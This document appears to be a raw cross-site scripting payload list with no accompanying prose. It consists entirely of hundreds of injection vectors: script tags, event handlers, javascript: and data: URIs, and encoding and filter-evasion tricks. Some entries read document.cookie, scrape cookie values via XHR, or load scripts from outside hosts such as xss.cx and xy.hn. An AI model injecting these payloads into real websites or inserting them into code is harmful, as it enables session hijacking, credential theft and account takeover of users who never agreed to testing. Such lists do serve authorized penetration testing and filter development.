src="data:image/svg+xml;> <frameset><frame src="xss"></frameset> <link href="http://host/xss.css"> "/>%3ciframe%20src%3djavascript%3aalert%283%29%3e <object><param name="src" value="javascript:alert(0)"></param></object> <isindex action=javascript:alert(1) type=image> <b/alt="1"onmouseover=InputBox+1 language=vbs>test</b> </a onmousemove="alert(1)"> '%26%26'javascript:alert%25281%2529// document.write("<scr"+"ipt language=javascript src=http://localhost/></scr"+"ipt>"); <scr<script>ipt>prompt(document.cookie)</scr</script>ipt> 12&<script>alert(123)</script>=123 <img src=x:alert(alt) onerror=eval(src) alt=0> <img src=/ onerror=alert(1)> a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d); <img/src="xss.png"alt="xss"> <IMG SRC="mocha:[code]"> <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script> <STYLE>@import'http://host/css';</STYLE> <SCRIPT+a=">'>" SRC="http://localhost"></SCRIPT> <scr<script>ipt>alert('XSS')</scr</script>ipt> %3Cscript%3Ealert(1)%3C/script%3E foo%00<script>alert(document.cookie)</script> "><<script>alert(document.cookie);//<</script> ><s"%2b"cript>alert(document.cookie)</s"%2B"cript> 3Cscript%3Ealert(1)%3C%2Fscript%3E %253Cscript%253Ealert(1)%253C/script%253E %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e %BCscript%BEalert(%A21%A2)%BC/script%BE %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE <object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> <a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">ugh</a> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== <a+href="javascript#alert(1);"> <IMG+SRC=j&#X41vascript:alert(1)> <IMG+SRC=javascript:alert('X')> %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE <IMG+SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000039&#0000041> %u0022%u003e%u003cscript%u003ealert%u0028%u0027Hello%u0027%u0029%u003c%u002fscript%u003e +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4- <INPUT+TYPE="checkbox"+onDblClick=confirm(XSS)> <APPLET+CODE=""+CODEBASE="http://url/xss"> <SCRIPT>alert(String.fromCharCode(88))</SCRIPT> <script>prompt(&apos;1&apos;)</script> <script>alert('xss')</script> `ĕ™ĔąĒĖb—ĈāĔĖ@9Ġĕĕ9A`&#xĕ™ĔąĒĖb tţŃŢőŠŤvŁŔŅŢŤPGŰţţGQt&WţŃŢőŠŤv "+style%3d"x%3aexpression(alert(1))+ \";alert(1);// <img src="x:%90" title="onerror=alert(1)//"> "+onmouseover="window.location='http://localhost' "+onkeypress="prompt(23)"+ "+onfocus="prompt(1)"+ 500);alert(1);// alert(document['cookie']) with(document)alert(cookie) ";location=location.hash)//#0={};alert(0) //";alert(String.fromCharCode(88,83,83)) %F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E "+onDblClick=prompt(123)"+ "+onError=prompt(123)"+ "+onReset=prompt(123)"+ ";eval(unescape(location))//#%0Aprompt(0) <SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT> %'});%0aalert(1);%20// <script>//>%0Aalert(1);</script> <IMG+SRC="javascript:alert(1);"> <IMG+SRC="jav%0dascript:alert(1);"> <IMG+SRC="jav#x0D;ascript:alert(1);"> <IMG+SRC="jav%09ascript:alert(1);"> <IMG+SRC="jav ascript:alert(1);"> %3Cscript%3Ealert(1)%3C/script%00TESTTEST%3E <script%00>alert(1)</script%00> <scr%00ipt>prompt(1)</sc%00ript> <scr\0ipt>prompt(1)</sc\0ript> %00"><script>alert(1)</script> %3Cscript%0Caaaaa%3Ealert%28123%29%3C/script%0Caaaaa%3E <script%0Caaaaa>alert(123)</script> %3Cscript%0Baaa%3Ealert%281%29%3C/script%0Baaaa%3E %3Cscript%0Baaa%3Ealert%281%29%3C/script%3E <*script>prompt(123)<*/script> <script%0Daaa>alert(1)</script%0Daaaa> <script%20TEST>alert(1)</script%20TESTTEST> <SCRIPT/XSSSRC="http://host"></SCRIPT> <SCRIPT+SRC=http://host/ <<SCRIPT>alert(1);//<</SCRIPT> < s c r i p t > p r o m p t ( 1 ) < / s c r i p t > %uff1cscript%uff1ealert(1234)%uff1c/script%uff1e javascript:propmpt(1) javascript:eval(unescape(location.href)) a="get";b="URL";c="javascript:";d="alert(1);";eval(a+b+c+d); location=location.hash.slice(1); ";location=location.hash)//#0={};alert(0) location=location.hash ""+{toString:alert} ""+{valueOf:alert} ";eval(unescape(location))//# %0Aalert(0) ";location.href='http://site';// "><script>alert(1)</script>=1"onPaste="eval(';)\'SSX\'(trela'.split('').reverse().join(''))" "><link rel="stylesheet" href="http://8ant.org/asdfqwer.css"><" "onfocusin="top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')" "onfocusout="parent[String.fromCharCode(500-403,500-392,500-399,500-386,500-384)](String.fromCharCode(300-212,300-217,300-217))" "onfocus="window['\141\154\145\162\164']('\130\123\123')" "onKeyDown="parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))" "onDblClick="window['aleraaaat'.replace('aaaa','')]('XaaaaSaaaaS'.replace('aaaa','').replace('aaaa',''))" "onMouseUp="wi&#110dow[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)]('XSS')" "onMouseEnter="alert('XSS')" "onMouseDown="alert('XSS')" "onMouseOut="alert('XSS')" "onMouseMove="alert('XSS')" "onMouseLeave="alert('XSS')" "onContextMenu="alert('XSS')" "onCopy="alert('XSS')" "onSelect="alert('XSS')" "onBlur="alert('XSS')" "onmouseover="(new Function('rssseturn(alesssrt)'.&#x73plit('sss').joi&#x6e('')))()(('SXS'+'SXS').slice(-5,4))" "onclick="alert('XSS')" "><script src="file:///c:/wonderful.js"></script><" <script/src=data:,alert()> <marquee/onstart=alert()> <video/poster/onerror=alert()> <isindex/autofocus/onfocus=alert()> <svg id=alert(1337) onload=eval(id)> <svg id=javascript:alert(1337) onload=location=id> <style onload='execScript("InputBox+1","VbScript");'> <a onhelp='eval(href+"confirm(1)")'contenteditable='true'href=' javascript:'>click</a> <img language=vbs src=<b onerror=alert#1/1#> <isindex action="javas&Tab;cript:alert(1)" type=image> "]<img src=1 onerror=alert(1)> <input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span> <svg[U+000B]onload=alert(1)> <iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}"> <cite><a href="javascript:confirm(1);">XSS cited!</a></cite> <svg/onload=window.onerror=alert;throw/XSS/;// <video src="x" onloadstart="alert(1)"> <a href="javascript:data:alert(1)">click</a> <a href="javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)">click</a> <div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div> <%%%> <meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J <!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> --> <! XSS="><img src=xx:x onerror=confirm(1)//"> "; ||confirm('XSS') || " <? echo('<SCR)'; "/> <img src='aaa' onerror=confirm(document.domain)> /> <img src='aaa' onerror=confirm(document.domain)> <!-- --!><input value="--><body/onload=`confirm(4)//`"> <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a> //|\\ <script //|\\ src='http://xss.cx/xss.js'> //|\\ </script //|\\ &#0000060 < &#0000062 > &#000060 < &#000062 > &#00060 < &#00062 > &#0060 < &#0062 > �</form><input type="date" onfocus="confirm(1)"> &#060 < &#062 > %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E "%25prompt(9)%25" "%26%26prompt(9)%26%26" %26lt%3bscript> "%26prompt(9)%26" %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E <3 </3 "><h1/onmouseover='\u0061lert(1)'>%00 "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' %3C %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E %3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E %3E [4076*A]<img src="x" alt="[0x8F]" test=" onerror=confirm(1)//"> &#60 < &#62 > <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> <A """><IMG SRC="javascript:confirm(1)"> "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF <A/HREF="javascript:confirm(1)"> <B <SCRIPT>confirm(1)</SCRIPT>> <BASE HREF="javascript:confirm('XSS');//"> <BGSOUND SRC="javascript:confirm('XSS');"> <BODY BACKGROUND="javascript:confirm('XSS')"> <BODY ONLOAD=confirm('XSS')> <BR SIZE="&{confirm('XSS')}"> <B="<SCRIPT>confirm(1)</SCRIPT>"> <DIV STYLE="background-image: url(javascript:confirm(5))"> <DIV STYLE="background-image: url(javascript:confirm(5))"> <DIV STYLE="width: expression(confirm(5));"> %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80 <FRAMESET><FRAME RC=""+"javascript:confirm(5);"></FRAMESET> <FRAMESET><FRAME SRC="javascript:confirm(5);"></FRAMESET> &GT &GT; <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4- <HTML><BODY> <IFRAME SRC="javascript:confirm(5);"></IFRAME> <IFRAME%20src='javascript:confirm%26%23x25;281)'> <![><IMG ALT="]><SCRIPT>confirm(1)</SCRIPT>"> <IMG ALT="><SCRIPT>confirm(1)</SCRIPT>"(EOF) <IMG DYNSRC="javascript:confirm(document.location)"> <IMG LOWSRC="javascript:confirm(document.location)"> <IMG SRC="  javascript:confirm(document.location);"> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=JaVaScRiPt:confirm(document.location)> <IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")> <IMG SRC=JaVaScRiPt:prompt(document.location)> <IMG SRC="jav ascript:confirm(document.location);"> <IMG SRC=java%00script:confirm(document.location)> <IMG SRC=`javascript:confirm(1)`> <IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))> <IMG SRC=`javascript:confirm(document.cookie)`> <IMG SRC="javascript:confirm(document.location)" <IMG SRC="javascript:confirm(document.location);"> <IMG SRC=javascript:confirm(document.location)> <IMG SRC=javascript:confirm("XSS")> <IMG SRC=javascript:prompt(document.location)> <IMG SRC="jav ascript:confirm(<WBR>document.location);"> <IMG SRC="jav ascript:confirm(document.location);"> <IMG SRC="javascript:confirm(<WBR>document.location);"> <IMG SRC="javascript:confirm(document.location);"> <IMG SRC="javascript:confirm(<WBR>document.location);"> <IMG SRC="javascript:confirm(document.location);"> <IMG SRC="livescript:[code]"> <IMG SRC="mocha:[code]"> <IMG SRC='vbscript:msgbox(document.location)'> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG STYLE="xss:expr/*XSS*/ession(confirm(document.location))"> <IMG onmouseover =confirm(1)> <IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a> <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('X&#83<WBR>;S'&#41> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> <INPUT TYPE="IMAGE" SRC="javascript:confirm(document.location);"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="http://xss.cx/xss.css"> <LINK REL="stylesheet" HREF="javascript:confirm(document.location);"> &LT &LT; <META HTTP-EQUIV="Link" Content="<http://xss.cx/xss.css>; REL=stylesheet"> <META HTTP-EQUIV="Link" Content="<javascript:confirm(document.location)>; REL=stylesheet"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>confirm(document.location)</SCRIPT>"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:confirm(document.location);"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:confirm(document.location);"> <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.cx/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT> PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+ <S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT> <SCR%00IPT>confirm(document.location)</SCR%00IPT> <SCRIPT SRC="http://xss.cx/xss.jpg"></SCRIPT> <SCRIPT SRC=http://xss.cx/xss.js?<B> <SCRIPT SRC=http://xss.cx/xss.js></SCRIPT> <SCRIPT a=">" '' SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT a=">" SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># </SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT/XSS SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT>a=document.cookie <SCRIPT>confirm(document.location);</SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.cx/xss.js"></SCRIPT> SRC=&#10<IMG 6;avascript:alert('XSS')> <STYLE TYPE="text/javascript">confirm(document.location);</STYLE> <STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A> <STYLE>@import'http://xss.cx/xss.css';</STYLE> "><STYLE>@import"javascript:confirm(document.location)";</STYLE> <STYLE>@im\port'\ja\vasc\ript:confirm(document.location)';</STYLE> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <TABLE BACKGROUND="javascript:confirm(document.location)"> &#X000003C < &#X000003E > &#X000003c < &#X000003e > &#X00003C < &#X00003E > &#X00003c < &#X00003e > &#X0003C < &#X0003E > &#X0003c < &#X0003e > &#X003C < &#X003E > &#X003c < &#X003e > &#X03C < &#X03E > &#X03c < &#X03e > &#X3C < &#X3E > &#X3c < &#X3e > <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <a data-remote=true data-method=delete href=/delete_account>CLICK</a> <a href=````> <a href="#" onclick="confirm(' &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ')">name</a> <a href='#' onmouseover ="javascript:$('a').html(5)">a link</a> <a href="// Í¥.ws">CLICK <a href=[0x0b]" onclick=confirm(1)//">click</a> <a href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a> <a href=``calc``> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a <a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> <a href="data:text/html,%3cscript>confirm (1)</script>" >hello <a href="data:text/html;base64,PHN2Zy萨9vbmxv晕YWQ<>>9YWxlc>>>nQoMSk+">click</a> "/><a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <a href="data:text/html,<script>eval(name)</script>" target="confirm(1)">click</a> <a href=``explorer.exe``> <a href="invalid:1" id=x name=y>test</a> "/><a href="invalid:2" id=x name=y>test</a> <a href="j&#00000000000000097vascript:window['confirm'](1)">aa</a> <a href="jAvAsCrIpT&colon;confirm&lpar;1&rpar;">X</a> <a href="jAvAsCrIpT&colon;confirm&lpar;1&rpar;">X</a> <a href="javas&Tab;cri&NewLine;pt:confirm(1)">test</a> <a href="//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a> "/><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a> "><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a> <a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click-XSS</a> "><a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <a href="javascript:'hello'" rel="sidebar">x</a> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:confirm(1)&NewLine;>X</a> <a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme a href="j&#x26#x41;vascript:confirm%252831337%2529">Hello</a> <a href=``mspaint.exe``> <a href=``notepad.exe``> <a href=``shell:System``> <a href='vbscript:"&#x5c&quot&confirm(1)&#39&#39"'> <a href="x:confirm(1)" id="test">click</a><script>eval(test+'')</script> <a href=``xss.cx``> <a id="x" href='http://adspecs.yahoo.com/adspecs.php' target="close(/*grabcookie(1)*/)">CLICK</a><script>onblur=function(){confirm(4)}x.click();</script> <a rel="noreferrer" href="//xss.cx">click</a> <a target=_blank href="data:text/html,<script>confirm(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a> <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E <a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> <a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> <a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;#test<a"'%0A`= +%20>; <a"'%0A`= +%20>;test<a"'%0A`= +%20>?test<a"'%0A`= +%20>;&x="><img src=x onerror=prompt(1);>#"><img src=x onerror=prompt(1);>test<a"'%0A`= +%20>; <a href=[�]"� onmouseover=prompt(1)//">XYZ</a about://xss.cx <a/href[\0C]=ja&Tab;vasc&Tab;ript&colon;confirm(1)>XXX</a> <a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a> <a$href="data:text/html,%style=""3cscript>confirm((1)</sstyle=""cript>" onerror=>hello <a/href=java&Tab;script:confirm%28/XSS/%29>click</a> <a/href="javascript: javascript:prompt(1)"><input type="X"> 